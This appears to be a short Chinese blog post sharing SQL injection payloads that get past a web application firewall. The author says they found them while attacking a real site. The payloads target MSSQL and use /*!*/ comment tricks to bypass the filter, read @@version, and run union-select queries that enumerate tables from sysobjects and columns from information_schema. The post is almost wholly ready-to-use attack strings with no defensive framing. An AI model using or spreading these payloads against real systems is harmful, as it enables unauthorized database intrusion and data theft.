sql注入bypass

最近渗透某个站点遇到了狗,经过千辛万苦总算绕过了,在这里分享一下过狗payload

绕过的主要方法还是加/*!*/

这里我主要以mssql注入做测试

绕and

and /*!*/1=2/*!*/

这里面我用db_name/*!*/()绕过函数

绕全局变量

/*!'*/@@version/*!'*/

查表

union  /*!x*//*!y*/select top 1 1,name,3  /*!x*//*!y*/from admin.dbo. sysobjects where xtype=0x55 and  name not in(cast(0x6e6577 as char)      )

查字段

union /*!x*//*!y*/select top 1 1,column_name,3 /*!y*//*!x*/from   /*!'*/information_schema.columns/*!'*/ where table_name=’user’ and  column_name not in(select top 2 column_name /*!y*//*!x*/from   /*!'*/information_schema.columns/*!'*/ )

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值